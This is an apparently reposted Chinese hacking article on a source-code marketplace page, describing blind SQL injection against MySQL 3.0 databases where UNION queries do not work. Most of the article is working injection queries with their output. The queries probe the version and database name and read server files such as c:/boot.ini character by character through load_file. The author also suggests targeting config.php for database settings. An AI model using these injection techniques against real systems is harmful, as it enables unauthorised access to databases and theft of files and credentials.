源码网商城,靠谱的源码在线交易网站 我的订单 购物车 帮助

源码网商城

申请开店
全部源码分类
首页 源码街 任务需求 版权中心 备案服务 商家入驻

关于mysql 3.0的注射的一点思路

  • 时间:2021-02-13 05:14 编辑: 来源: 阅读:
  • 扫一扫,手机访问
摘要:关于mysql 3.0的注射的一点思路
mysql 3.0的注射   对mysql的注射主要是靠union 的联合查询,但union只对版本4。0以上的有用,对3。0以下的就没用了。。。。。。。。。。   所以在mysql 3.0的数据库里没办法使用union进行跨表查询,但可以使用load_file   但是也不可以直接使用union替换出来。 下面就是我的一点思路:   得到版本:   mysql> select * from user where userid=1 and length(version())<10;   Empty set (0.00 sec)   mysql> select * from user where userid=1 and length(version())<1777;   +--------+----------+----------+   | userid | username | password |   +--------+----------+----------+   | 1 | angel | mypass |   +--------+----------+----------+   1 row in set (0.00 sec)   得到当前数据库:   mysql> select * from user where userid=1 and length(database())>0;   +--------+----------+----------+   | userid | username | password |   +--------+----------+----------+   | 1 | angel | mypass |   +--------+----------+----------+   1 row in set (0.00 sec)   暴取文件代码:   mysql> select * from user where userid=1 and ascii(mid(load_file('c:/boot.ini'),1,1))<1;   Empty set (0.05 sec)   mysql> select * from user where userid=1 and ascii(mid(load_file('c:/boot.ini'),1,1))>1;   +--------+----------+----------+   | userid | username | password |   +--------+----------+----------+   | 1 | angel | mypass |   +--------+----------+----------+   1 row in set (0.00 sec)   因为工作量大,可以用程序来实现(不过也很麻烦)   另外思路: 可以先使用字符处理函数得到"特殊字符的位置",如我们暴的是config.php文件我们就可以选取"localhost"(或其他)为特殊字符,先得到所在的位置(在哪个字节),在去猜它附近的,这样可以省去不少工作量。  
  • 全部评论(0)
上一篇:网友举报:屁屁宽频软件自带木马病毒(图)
下一篇:eWebSoft在线编辑器漏洞利用技巧
关于我们 | 广告合作 | 联系我们 | 隐私条款 | 免责声明 | 网站地图

苏ICP备2024110244号-2      苏公网安备32050702011978号      增值电信业务经营许可证编号:苏B2-20251499   |  Copyright 2018 - 2025   源码网商城 (www.ymwmall.com) 版权所有

联系客服
客服电话:
400-000-3129
微信版

扫一扫进微信版
返回顶部